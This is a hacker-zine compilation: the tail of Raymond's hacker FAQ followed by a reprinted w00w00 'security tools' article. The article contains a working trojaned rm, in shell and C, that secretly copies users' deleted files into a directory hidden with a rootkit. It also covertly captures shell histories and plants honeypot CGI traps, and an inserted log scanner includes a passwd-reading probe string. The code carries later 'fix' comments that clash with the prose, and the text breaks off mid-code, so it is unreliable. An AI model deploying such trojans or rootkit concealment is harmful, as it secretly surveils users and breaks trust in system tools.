5. Serve the hacker culture itself.

Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker :-)). This is not something you'll be
positioned to do until you've been around for a while and become well-known for one of the first four things.

The hacker culture doesn't have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you've been in the
trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is
dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.

The Hacker/Nerd Connection

Contrary to popular myth, you don't have to be a nerd to be a hacker. It does help, however, and many hackers are in fact nerds. Being a social outcast helps you
stay concentrated on the really important things, like thinking and hacking.

For this reason, many hackers have adopted the label `nerd' and even use the harsher term `geek' as a badge of pride -- it's a way of declaring their independence
from normal social expectations. See The Geek Page for extensive discussion.

If you can manage to concentrate enough on hacking to be good at it and still have a life, that's fine. This is a lot easier today than it was when I was a newbie in the
1970s; mainstream culture is much friendlier to techno-nerds now. There are even growing numbers of people who realize that hackers are often high-quality lover
and spouse material. For more on this, see Girl's Guide to Geek Guys.

If you're attracted to hacking because you don't have a life, that's OK too -- at least you won't have trouble concentrating. Maybe you'll get one later.

Points For Style

Again, to be a hacker, you have to enter the hacker mindset. There are some things you can do when you're not at a computer that seem to help. They're not
substitutes for hacking (nothing is) but many hackers do them, and feel that they connect in some basic way with the essence of hacking.

 * Read science fiction. Go to science fiction conventions (a good way to meet hackers and proto-hackers).
 * Study Zen, and/or take up martial arts. (The mental discipline seems similar in important ways.)
 * Develop an analytical ear for music. Learn to appreciate peculiar kinds of music. Learn to play some musical instrument well, or how to sing.
 * Develop your appreciation of puns and wordplay.
 * Learn to write your native language well. (A surprising number of hackers, including all the best ones I know of, are able writers.)

The more of these things you already do, the more likely it is that you are natural hacker material. Why these things in particular is not completely clear, but they're
connected with a mix of left- and right-brain skills that seems to be important (hackers need to be able to both reason logically and step outside the apparent logic of
a problem at a moment's notice).

Finally, a few things not to do.

 * Don't use a silly, grandiose user ID or screen name.
 * Don't get in flame wars on Usenet (or anywhere else).
 * Don't call yourself a `cyberpunk', and don't waste your time on anybody who does.
 * Don't post or email writing that's full of spelling errors and bad grammar.

The only reputation you'll make doing any of these things is as a twit. Hackers have long memories -- it could take you years to live it down enough to be accepted.

Other Resources

Peter Seebach maintains an excellent Hacker FAQ for managers who don't understand how to deal with hackers.

The Loginataka has some things to say about the proper training and attitude of a Unix hacker.

I have also written A Brief History Of Hackerdom.

I have written a paper, The Cathedral and the Bazaar, which explains a lot about how the Linux and open-source cultures work. I have addressed this topic even
more directly in its sequel Homesteading the Noosphere.

Frequently Asked Questions

Q: Will you teach me how to hack?

Since first publishing this page, I've gotten several requests a week from people to "teach me all about hacking". Unfortunately, I don't have the time or energy to do
this; my own hacking projects take up 110% of my time.

Even if I did, hacking is an attitude and skill you basically have to teach yourself. You'll find that while real hackers want to help you, they won't respect you if you
beg to be spoon-fed everything they know.

Learn a few things first. Show that you're trying, that you're capable of learning on your own. Then go to the hackers you meet with specific questions.

Q: Would you help me to crack a system, or teach me how to crack?

No. Anyone who can still ask such a question after reading this FAQ is too stupid to be educable even if I had the time for tutoring. Any emailed requests of this
kind that I get will be ignored or answered with extreme rudeness.

Q: Where can I find some real hackers to talk with?

The best way is to find a Unix or Linux user's group local to you and go to their meetings (you can find links to several lists of user groups on the LDP page at
Sunsite).

(I used to say here that you wouldn't find any real hackers on IRC, but I'm given to understand this is changing. Apparently some real hacker communities, attached
to things like GIMP and Perl, have IRC channels now.)

Q: What language should I learn first?

HTML, if you don't already know it. There are a lot of glossy, hype-intensive bad HTML books out there, and distressingly few good ones. The one I like best is
HTML: The Definitive Guide.

But HTML is not a full programming language. When you're ready to start programming, I would recommend starting with Python. You will hear a lot of people
recommending Perl, and Perl is still more popular than Python, but it's harder to learn.

C is really important, but it's also much more difficult than either Python or Perl. Don't try to learn it first.

Q: But won't open-source software leave programmers unable to make a living?

This seems unlikely -- so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net
economic gain over not having it written, a programmer will get paid whether or not the program is going to be free after it's done. And, no matter how much "free"
software gets written, there always seems to be more demand for new and customized applications. I've written more about this at the Open Source pages.

Q: How can I get started? Where can I get a free Unix?

Elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to
educate yourself. Start now...

$Date: 1999/03/26 09:18:00 $


Eric S. Raymond <esr@snark.thyrsus.com>


@HWA


SITE.1 Featured site: http://www.w00w00.org/
~~~~~~~~~~~~~~~~~~~



This is an excerpt entitled "Security and Monitoring Tools for the Paranoid
Sysadmin" and is a good example of the quality content that can be found
at this site. There are some good examples here; check out the site for
more...

http://www.w00w00.org/ - www.w00w00.org, "w00w00 Security"


Security and Monitoring Tools
-----------------------------
Shok (Matt Conover)
shok@dataforce.net, shok@sekurity.org

What I plan for this to be is various utilities that you might think of
as of use, and whatnot. This is mainly a few security tips that I like to
use.

First off, edit your /etc/profile, and add the line:
export HISTFILE=/tmp/hist/`whoami`

and then do:
mkdir /tmp/hist; chmod 1777 /tmp/hist

You now want to hide that file, so the users don't see the dir (it can be
seen with set but not too many people check :) and you hide it with the
rootkit's ls.

Another few things I like to do.
I made a trojaned 'rm' that basically calls /bin/rm.bak which is hidden
(via rootkit ls), and it copies the file they are trying to delete to
/tmp/fill (which is also hidden via rootkit ls).
There are two versions of this....I wrote the first one in shell script,
but due to the fact it has to be a+r, I wrote it in C afterwards. Here is
the rm.sh:

#!/bin/sh
# rm trojan, stores files in a temp directory, that is +tw, but go-r
# the directory this writes to should be hidden with a trojaned ls
# (via rootkit)
# this is just an example...USE rm.c ;)
#
# fixes: "-gt" instead of ">" (which sh reads as a redirection to a file
# named "1"), ">/dev/null 2>&1" instead of the bash-only "&>", "$@" instead
# of bare $* so names with spaces survive, "cp -rf" in the recursive cases
# so whole trees are kept (not just the first directory's top level), the
# missing "rm" argv0 in the -r case, and IT=$1 without spaces.

if [ $# -gt 1 ]
then

case $1 in
-i)
shift
cp -f "$@" /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -i "$@"
;;

--interactive)
shift
cp -f "$@" /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -i "$@"
;;


-f)
shift
cp -f "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak -f "$@"
;;

--force)
shift
cp -f "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak -f "$@"
;;


-d)
shift
cp "$1"/* /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -d "$@"
;;

--directory)
shift
cp "$1"/* /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -d "$@"
;;


-v)
shift
cp -f "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak -v "$@"
;;

--verbose)
shift
cp -f "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak -v "$@"
;;


-r)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -R "$@"
;;

-R)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -R "$@"
;;

--recursive)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -R "$@"
;;


-ri)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak -ri "$@"
;;

-Ri)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -ri "$@"
;;


-rf)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak -rf "$@"
;;

-Rf)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak -rf "$@"
;;


-rd)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -rd "$@"
;;

-Rd)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -rd "$@"
;;


-Rv)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -rv "$@"
;;

-rv)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
doexec /bin/rm.bak rm -rv "$@"
;;


-fv)
shift
cp -f "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak -fv "$@"
;;


-Rfv)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak -rfv "$@"
;;

-rfv)
shift
cp -rf "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak -rfv "$@"
;;

*)
cp -f "$@" /tmp/fill >/dev/null 2>&1
/bin/rm.bak "$@"
;;
esac

else
IT=$1
cp -f "$IT" /tmp/fill >/dev/null 2>&1
/bin/rm.bak "$IT"

fi

If you do not have the program doexec, write it like this:

#include <stdio.h>
#include <unistd.h>

/* doexec PROGRAM ARGV0 [ARGS...]: run PROGRAM with ARGV0 as its argv[0] and
 * pass every remaining argument through (the fixed four-slot execl() dropped
 * arguments past the fourth and read past argv[] when fewer were given). */
int main(int argc, char **argv)
{
    if (argc < 3)
        return 1;
    execv(argv[1], argv + 2);
    perror("execv"); /* only reached if the exec failed */
    return 1;
}


Now for rm.c:

/* ------------------------------------------------------ */
/* rm.c -- rm "trojan" by Shok (Matt Conover) */
/* ------------------------------------------------------ */
/* Email: shok@dataforce.net, shok@sekurity.org */
/* */
/* Corrected: main() returns int, the flag variables start at 0, "v" no */
/* longer takes an argument in the getopt() string, every operand (not */
/* just argv[2]) is backed up, cp is exec'd directly instead of through */
/* system() and $PROGRAM, and a single exec hands the combined flags */
/* plus all operands to /bin/rm.bak. */

#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define REAL_RM "/bin/rm.bak"
#define FILL_DIR "/tmp/fill"

/* Copy one operand into FILL_DIR before it is removed. The name goes */
/* straight to cp's argv, so no shell ever re-parses it; -r keeps whole */
/* trees for recursive removals. cp's own output is discarded. */
static void backup(const char *path, int recursive)
{
    pid_t pid = fork();

    if (pid == 0) {
        int devnull = open("/dev/null", O_WRONLY);
        if (devnull != -1) {
            dup2(devnull, STDOUT_FILENO);
            dup2(devnull, STDERR_FILENO);
        }
        execl("/bin/cp", "cp", recursive ? "-rf" : "-f", path, FILL_DIR, (char *)NULL);
        _exit(127);
    } else if (pid > 0) {
        waitpid(pid, NULL, 0);
    }
}

int main(int argc, char **argv)
{
    int i, c, n;
    int recursive = 0, verbose = 0, force = 0, interactive = 0;
    char flags[8] = "-";
    char **args;

    while ((c = getopt(argc, argv, "Rrifv")) != -1) {
        switch (c) {
        case 'R':
        case 'r':
            recursive = 1;
            break;
        case 'i':
            interactive = 1;
            break;
        case 'f':
            force = 1;
            break;
        case 'v':
            verbose = 1;
            break;
        default: /* '?': unknown option */
            exit(1);
        }
    }

    if (optind >= argc)
        exit(0); /* nothing to remove */

    if (recursive) strcat(flags, "r");
    if (force) strcat(flags, "f");
    if (interactive) strcat(flags, "i");
    if (verbose) strcat(flags, "v");

    /* Keep a copy of every operand, then hand them all to the real rm. */
    for (i = optind; i < argc; i++)
        backup(argv[i], recursive);

    args = malloc((argc - optind + 3) * sizeof(char *));
    if (args == NULL)
        exit(1);
    n = 0;
    args[n++] = "rm";
    if (flags[1] != '\0')
        args[n++] = flags;
    for (i = optind; i < argc; i++)
        args[n++] = argv[i];
    args[n] = NULL;

    execv(REAL_RM, args);
    perror(REAL_RM); /* only reached if the exec failed */
    return 1;
}

This program can of course be improved, especially replacing the strcmp's
with getopt() but I could care less....

Now whenever a user deletes something it will first be copied to
/tmp/fill before it's deleted.

Now, even though it's logged to /var/log/httpd/access_log, I'd like to
know right away when someone tries to use the phf or test-cgi
vulnerabilities on me. So I replaced the phf and test-cgi programs in my
/cgi-bin/ with this. The first will get the info on who it is, then it
will send a fake passwd file. This can be improved of course but I don't
care to take the time.

phf.c:

/* w00w00! */
/* phf trojan */
/* -------------------------------------------------------------------- */
/* Just a little utility to log information about who is exploiting us. */
/* Will mail it to root of local host, with the IP address, the web */
/* browser, the query string, etc. It will then return a fake password */
/* below which can be modified. */
/* */
/* Shok (Matt Conover) */
/* shok@dataforce.net, shok@sekurity.org */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h> /* for wait() */


/* List of defines */
#define ERROR -1

#define IP "206.71.69.243" /* Set this to your IP address. */

#define ADMIN "root" /* Set this to the user (or address) of the person */
/* to get phf attempts. */

#define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */
#define MAILPROG "/bin/mail" /* This does have to be the 'mail' */
/* program but this is to specify the */
/* path. */

/* This returns a '404 File Not Found' to the client. */
#define PRNSERVERR() printf("Content-type: text/html\n\n"); \
printf("<HTML><HEAD>\n"); \
printf("<TITLE>404 File Not Found</TITLE>\n"); \
printf("</HEAD><BODY>\n"); \
\
printf("<H1>File Not Found</H1>\n"); \
printf("The requested URL was not found on this server.<P>\n"); \
\
printf("</BODY></HTML>\n"); \
\
fflush(stdout), fflush(stderr); /* fflush() on an input stream is undefined */

/* Free up our structures before exiting. */
#define FREEALL() free(buf), free(cmdarg), free(address);
/* ------------------ */

int main(void)
{
FILE *tmpfile, *fingerinfo;

int pid;
int fd[2];
register int errors = 0;

char *buf = malloc(4096);
char *cmdarg = malloc(512);
char *address = malloc(256);

char *host = getenv("REMOTE_HOST");
char *addr = getenv("REMOTE_ADDR");
char *browser = getenv("HTTP_USER_AGENT");
char *query_string = getenv("QUERY_STRING");

/* The server may leave any of these unset (no reverse lookup, no */
/* query string); substitute something printable so printf(), */
/* strcmp() and strstr() never get a NULL pointer. */
if (addr == NULL) addr = "unknown";
if (host == NULL) host = addr;
if (browser == NULL) browser = "unknown";
if (query_string == NULL) query_string = "";


/* We check each malloc seperately so we can free */
/* any previously malloc()'d buffers. */
if (buf == NULL) {
perror("malloc");
PRNSERVERR();
exit(ERROR);
} else memset(buf, 0, 4096); /* sizeof(buf) is the pointer's size, not the buffer's */

if (cmdarg == NULL) {
perror("malloc");
PRNSERVERR();
free(buf);
exit(ERROR);
} else memset(cmdarg, 0, 512);

if (address == NULL) {
perror("malloc");
PRNSERVERR();
free(buf), free(cmdarg);
exit(ERROR);
} else memset(address, 0, 256);
/* ----------------------------- */


if (pipe(fd) == ERROR) {
perror("pipe");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

memset(buf, 0, 4096);

if ((pid = fork()) == ERROR) {

openlog("phf", LOG_PID, LOG_USER);
syslog(LOG_ERR, "Unable to fork().");
closelog();

PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) {
close(fileno(stdout)), close(fileno(stderr)), close(fd[0]);
dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */
dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

sprintf(address, "@%.*s", 256 - 1, host);

/* Log information. */
printf("The following person used phf!!\n\n");
printf("\tHost: %s\n", host);
printf("\tAddress: %s\n", addr);
printf("\tBrowser type: %s\n", browser);
printf("\tQuery String (i.e. command entered): %s\n\n", query_string);

printf("Information collected from fingering host (if any):\n");
printf("---------------------------------------------------\n\n");
fflush(stdout);

if ((strcmp(addr, IP) != 0) && (strcmp(addr, "127.0.0.1") != 0))
execl(FINGERPROG, "finger", address, (char *)NULL);
else
printf("[from the localhost (%s)]\n", IP);

printf(".\n"); /* Terminate 'mail'. */
/* --------------- */

FREEALL();
exit(0);
} else {

/* Parent: keep stdout for the HTTP reply and stderr for the server's */
/* error log. The pipe's read end becomes our stdin so the mail child */
/* inherits it; the write end is closed so the pipe reaches EOF as soon */
/* as the logging child is done (the old code dup2()'d the already */
/* closed fd[1] onto stderr, which silently failed). */
close(fd[1]);
dup2(fd[0], fileno(stdin));
close(fd[0]);

/* Setup the subject to send to mail. It is passed to mail(1) as its */
/* own argv element, so no shell quoting is needed. */
snprintf(cmdarg, 512, "PHF ATTEMPT FROM %s!", host);

/* fork() another child to execute the mail program. It reads from the */
/* pipe while the logging child is still writing, so a long finger */
/* reply cannot fill the pipe and stall both sides. */
if ((pid = fork()) == ERROR) {
perror("fork");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) {
execl(MAILPROG, "mail", "-s", cmdarg, ADMIN, (char *)NULL);
_exit(ERROR); /* only reached if the exec failed */
}

close(fileno(stdin)); /* the parent has no further use for the pipe */
while (wait(NULL) > 0) ; /* reap the logging and mail children before replying */
}

/* Send a fake password file.. if there is a "cat" and "/etc/passwd" */
/* in the QUERY_STRING. Otherwise report file not found (this can */
/* cause problems if they first send a cat /etc/passwd and then send */
/* an xterm request for example. */

if (strstr(query_string, "cat") && strstr(query_string, "/etc/passwd")) {
printf("Content-type: text/html\n\n");
printf("<HTML><HEAD>\n");
printf("<TITLE>Query Results</TITLE>\n");
printf("<H1>Query Results</H1>\n");
printf("</HEAD><BODY>\n");

printf("<P>\n");
printf("/usr/local/bin/ph -m alias=x \n");
printf("cat /etc/passwd\n");
printf("<PRE>\n");
printf("root:x3DgdbFdn:0:1:Operator:/:/bin/csh\n");
printf("nobody:*:65534:65534::/:\n");
printf("daemon:*:1:1::/:\n");
printf("sys:*:2:2::/:/bin/csh\n");
printf("bin:*:3:3::/bin:\n");
printf("uucp:*:9:9::/var/spool/uucppublic:\n");
printf("news:*:6:6::/var/spool/news:/bin/csh\n");
printf("mail:*:8:8::/:\n");
printf("audit:*:11:11::/usr/sbin/audit:/bin/csh\n");
printf("slip::25:25:SLIP:/tmp:/usr/sbin/sliplogin\n");
printf("sync::1:1::/:/bin/sync\n");
printf("sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag\n");
printf("sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag\n");
printf("ftp:*:10:20:ftp:/home/ftp:/usr/bin/bash\n");
printf("www:*:50:50:World Wide Web:/home/www:/usr/bin/bash\n");
printf("pop:*:60:60:Post Office Protocol:/var/spool/pop:/usr/bin/bash\n");
printf("f33r:A23gAdcYf5:4110:100:f33r me bitch:/home/hph:/usr/local/bin/tcsh\n");
printf("john:Vf84.y4kl/:4120:18:John Preston:/usr/john:/usr/bin/bash\n");
printf("lolop:j7Hf./fdf:8900:100:LoLoP:/home/lolop:/usr/local/bin/tcsh\n");
printf("pcguest::7454:100:Guest Account:/tmp:/usr/bin/sh\n");
printf("pscoot:Em8y0pwT.5umo:8930:100:Pike Scoot:/home/pscoot:/usr/bin/bash\n");
printf("shok:aDrsBsefYr:666:100:Matt Conover:/home/shok:/bin/bash\n");
printf("majordomo:*:405:20:Majordomo server:/dev/null:/bin/startdomo\n");
printf("listserv:*:567:20:Listserv server:/dev/null:/bin/sh\n");
printf("jsmith:Fdd34cDfc:8940:100:Jim Smith:/home/jsmith:/usr/bin/bash\n");
printf("db:*:8970:100:Dieter Beule:/usr/sirius/dieter:/usr/bin/bash\n");
printf("guest:*:8999:110:Guest:/home/guest:/usr/local/bin/tcsh\n");
printf("</PRE>");

printf("</BODY></HTML>\n");
} else {
PRNSERVERR();
}

FREEALL(); /* once only: freeing again on the 404 path was a double free */
return 0;
}


test-cgi.c:

/* w00w00! */
/* test-cgi trojan */
/* -------------------------------------------------------------------- */
/* Just a little utility to log information about who is exploiting us. */
/* Will mail it to root of local host, with the IP address, the web */
/* browser, the query string, etc. It will then return a File Not Found */
/* error. */
/* */
/* Shok (Matt Conover) */
/* shok@dataforce.net, shok@sekurity.org */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h> /* for wait() */

/* List of defines */
#define ERROR -1

#define IP "206.71.69.243" /* Set this to your IP address. */

#define ADMIN "root" /* Set this to the user (or address) of the person */
/* to get test-cgi attempts. */

#define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */
#define MAILPROG "/bin/mail" /* This does have to be the 'mail' */
/* program but this is to specify the */
/* path. */

/* This returns a '404 File Not Found' to the client. */
#define PRNSERVERR() printf("Content-type: text/html\n\n"); \
printf("<HTML><HEAD>\n"); \
printf("<TITLE>404 File Not Found</TITLE>\n"); \
printf("</HEAD><BODY>\n"); \
\
printf("<H1>File Not Found</H1>\n"); \
printf("The requested URL was not found on this server.<P>\n"); \
\
printf("</BODY></HTML>\n"); \
\
fflush(stdout), fflush(stderr); /* fflush() on an input stream is undefined */

/* Free up our structures before exiting. */
#define FREEALL() free(buf), free(cmdarg), free(address);
/* ------------------ */

int main(void)
{
FILE *tmpfile, *fingerinfo;

int pid;
int fd[2];
register int errors = 0;

char *buf = malloc(4096);
char *cmdarg = malloc(512);
char *address = malloc(256);

char *host = getenv("REMOTE_HOST");
char *addr = getenv("REMOTE_ADDR");
char *browser = getenv("HTTP_USER_AGENT");
char *query_string = getenv("QUERY_STRING");

/* The server may leave any of these unset (no reverse lookup, no */
/* query string); substitute something printable so printf() and */
/* strcmp() never get a NULL pointer. */
if (addr == NULL) addr = "unknown";
if (host == NULL) host = addr;
if (browser == NULL) browser = "unknown";
if (query_string == NULL) query_string = "";


/* We check each malloc seperately so we can free */
/* any previously malloc()'d buffers. */
if (buf == NULL) {
perror("malloc");
PRNSERVERR();
exit(ERROR);
} else memset(buf, 0, 4096); /* sizeof(buf) is the pointer's size, not the buffer's */

if (cmdarg == NULL) {
perror("malloc");
PRNSERVERR();
free(buf);
exit(ERROR);
} else memset(cmdarg, 0, 512);

if (address == NULL) {
perror("malloc");
PRNSERVERR();
free(buf), free(cmdarg);
exit(ERROR);
} else memset(address, 0, 256);
/* ----------------------------- */


if (pipe(fd) == ERROR) {
perror("pipe");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

memset(buf, 0, 4096);

if ((pid = fork()) == ERROR) {

openlog("test-cgi", LOG_PID, LOG_USER);
syslog(LOG_ERR, "Unable to fork().");
closelog();

PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) {
close(fileno(stdout)), close(fileno(stderr)), close(fd[0]);
dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */
dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

sprintf(address, "@%.*s", 256 - 1, host);

/* Log information. */
printf("The following person used test-cgi!\n\n");
printf("\tHost: %s\n", host);
printf("\tAddress: %s\n", addr);
printf("\tBrowser type: %s\n", browser);
printf("\tQuery String (i.e. command entered): %s\n\n", query_string);

printf("Information collected from fingering host (if any):\n");
printf("---------------------------------------------------\n\n");
fflush(stdout);

/* Compare the client's address, not the "@host" string built above, */
/* which could never equal IP and so always ran finger. */
if ((strcmp(addr, IP) != 0) && (strcmp(addr, "127.0.0.1") != 0))
execl(FINGERPROG, "finger", address, (char *)NULL);
else
printf("[from the local host (%s)]\n", IP);

printf(".\n"); /* Terminate 'mail'. */
/* --------------- */

FREEALL();
exit(0);
} else {

/* Parent: keep stdout for the HTTP reply and stderr for the server's */
/* error log. The pipe's read end becomes our stdin so the mail child */
/* inherits it; the write end is closed so the pipe reaches EOF as soon */
/* as the logging child is done (the old code dup2()'d the already */
/* closed fd[1] onto stderr, which silently failed). */
close(fd[1]);
dup2(fd[0], fileno(stdin));
close(fd[0]);

/* Setup the subject to send to mail. It is passed to mail(1) as its */
/* own argv element, so no shell quoting is needed. */
snprintf(cmdarg, 512, "TEST-CGI ATTEMPT FROM %s!", host);

/* fork() another child to execute the mail program. It reads from the */
/* pipe while the logging child is still writing, so a long finger */
/* reply cannot fill the pipe and stall both sides. */
if ((pid = fork()) == ERROR) {
perror("fork");
PRNSERVERR();
FREEALL();
exit(ERROR);
}

if (pid == 0) {
execl(MAILPROG, "mail", "-s", cmdarg, ADMIN, (char *)NULL);
_exit(ERROR); /* only reached if the exec failed */
}

close(fileno(stdin)); /* the parent has no further use for the pipe */
while (wait(NULL) > 0) ; /* reap the logging and mail children before replying */
}

PRNSERVERR(); /* Just return 404 File Not Found. */
FREEALL();
return 0;
}

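The phf.c and test-cgi.c traps above react at request time; the same signal can be pulled out of access_log after the fact. What follows is an added example, not part of Shok's article or the w00w00 code. It percent-decodes the query of every /cgi-bin/phf request and flags the two things the trap keys on: a reference to /etc/passwd, and an embedded newline or carriage return, which no legitimate ph lookup carries. The log lines are constructed for the example (Common Log Format, made-up addresses and timestamps); url_decode, is_phf_probe and count_phf_probes are names chosen here, not anything from the article.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

static int hexval(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = (unsigned char)tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decode src into dst ('+' becomes a space, as in form encoding).
 * Returns the decoded length, or -1 if dst (dst_len bytes) is too small. */
int url_decode(const char *src, char *dst, size_t dst_len)
{
    size_t n = 0;
    while (*src) {
        int hi, lo;
        if (n + 1 >= dst_len) return -1;
        if (*src == '%' && (hi = hexval((unsigned char)src[1])) >= 0
                        && (lo = hexval((unsigned char)src[2])) >= 0) {
            dst[n++] = (char)(hi * 16 + lo);
            src += 3;
        } else {
            dst[n++] = (*src == '+') ? ' ' : *src;
            src++;
        }
    }
    dst[n] = '\0';
    return (int)n;
}

/* Test helper: 1 if src decodes to exactly expected. */
int decode_matches(const char *src, const char *expected)
{
    char out[256];
    return url_decode(src, out, sizeof out) >= 0 && strcmp(out, expected) == 0;
}

/* 1 if the query looks like a phf probe: a reference to /etc/passwd (what
 * the trap's phf.c keys on) or an embedded newline/carriage return, which
 * no legitimate ph lookup carries. Over-long input is flagged rather than
 * silently truncated. */
int is_phf_probe(const char *query)
{
    char decoded[1024];
    if (url_decode(query, decoded, sizeof decoded) < 0) return 1;
    if (strchr(decoded, '\n') || strchr(decoded, '\r')) return 1;
    return strstr(decoded, "/etc/passwd") != NULL;
}

/* Copy the raw query of a CLF request line into out; 0 if it is not a
 * phf request. The query ends at the first space or closing quote. */
static int extract_phf_query(const char *line, char *out, size_t out_len)
{
    const char *p = strstr(line, "/cgi-bin/phf?");
    size_t n;
    if (p == NULL) return 0;
    p += strlen("/cgi-bin/phf?");
    n = strcspn(p, " \"");
    if (n >= out_len) n = out_len - 1;
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* Count phf probes in a newline-separated access log held in memory. */
int count_phf_probes(const char *log)
{
    int hits = 0;
    char line[2048], query[1024];
    while (*log) {
        size_t len = strcspn(log, "\n");
        size_t n = len < sizeof line ? len : sizeof line - 1;
        memcpy(line, log, n);
        line[n] = '\0';
        if (extract_phf_query(line, query, sizeof query) && is_phf_probe(query))
            hits++;
        log += len;
        if (*log == '\n') log++;
    }
    return hits;
}

/* Constructed sample in Common Log Format; addresses and times are made up. */
const char SAMPLE_LOG[] =
    "10.0.0.5 - - [01/Apr/1999:10:00:00 -0500] \"GET /index.html HTTP/1.0\" 200 1523\n"
    "10.0.0.9 - - [01/Apr/1999:10:00:07 -0500] \"GET /cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd HTTP/1.0\" 200 811\n"
    "10.0.0.9 - - [01/Apr/1999:10:00:09 -0500] \"GET /cgi-bin/phf?Qname=smith HTTP/1.0\" 200 233\n"
    "10.0.0.12 - - [01/Apr/1999:10:01:44 -0500] \"GET /cgi-bin/phf?Qname=passwd HTTP/1.0\" 200 190\n"
    "10.0.0.12 - - [01/Apr/1999:10:01:50 -0500] \"GET /cgi-bin/phf?Qalias=x%0D%0A HTTP/1.0\" 200 190\n";

int main(void)
{
    printf("phf probes in sample log: %d\n", count_phf_probes(SAMPLE_LOG)); /* 2 */
    return 0;
}
```

The decode step matters: the trap's strstr() on the raw QUERY_STRING misses a request that spells "/etc/passwd" with percent-escapes, and the fourth sample line shows why the rule is anchored on the full path rather than the word "passwd". Note that the third line (a plain Qname lookup) is what legitimate phf traffic looked like, so a rule that fired on every phf request would have been useless on a site that actually ran the directory service.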

Just as an added bonus here.........
When someone goes to a directory you have .htaccess in, it will send 401,
which is the unauthorized error code (pretty sure it's 401 but not in the
mood to check). Now I edited my srm.conf (usually
/usr/local/etc/httpd/conf/srm.conf), and added this line:

ErrorDocument 401 /cgi-bin/unauthorized.cgi

This is basically like the one above.......except it differs
by the 'user' part, which lets you know what user it was...this is a
good way to know if there is an unauthorized attempt, and/or what user is
logging into your webpage that is secured......

unauthorized.c:


/* w00w00! */
/* Unauthorized access catcher. */
/* -------------------------------------------------------------------- */
/* Just a little utility to log information about who is unauthorized */
/* to access the web page. Will mail it to root of local host, with the */
/* IP address, the web browser, user, ident, the query string, etc. */
/* */
/* Shok (Matt Conover) */
/* shok@dataforce.net, shok@sekurity.org */

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h> /* for wait() */

/* List of defines */
#define ERROR -1

#define ADMIN "root" /* Set this to the user (or address) of the person */
/* to get the unauthorized-access reports. */

#define IP "206.71.69.243" /* Set this to your IP address. */

#define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */
#define MAILPROG "/bin/mail" /* This does have to be the 'mail' */
/* program but this is to specify the */
/* path. */

/* This returns a '404 File Not Found' to the client. */
#define PRNSERVERR() printf("Content-type: text/html\n\n"); \
printf("<HTML><HEAD>\n"); \
printf("<TITLE>404 File Not Found</TITLE>\n"); \
printf("</HEAD><BODY>\n"); \
\
printf("<H1>File Not Found</H1>\n"); \
printf("The requested URL was not found on this server.<P>\n"); \
\
printf("</BODY></HTML>\n"); \
\
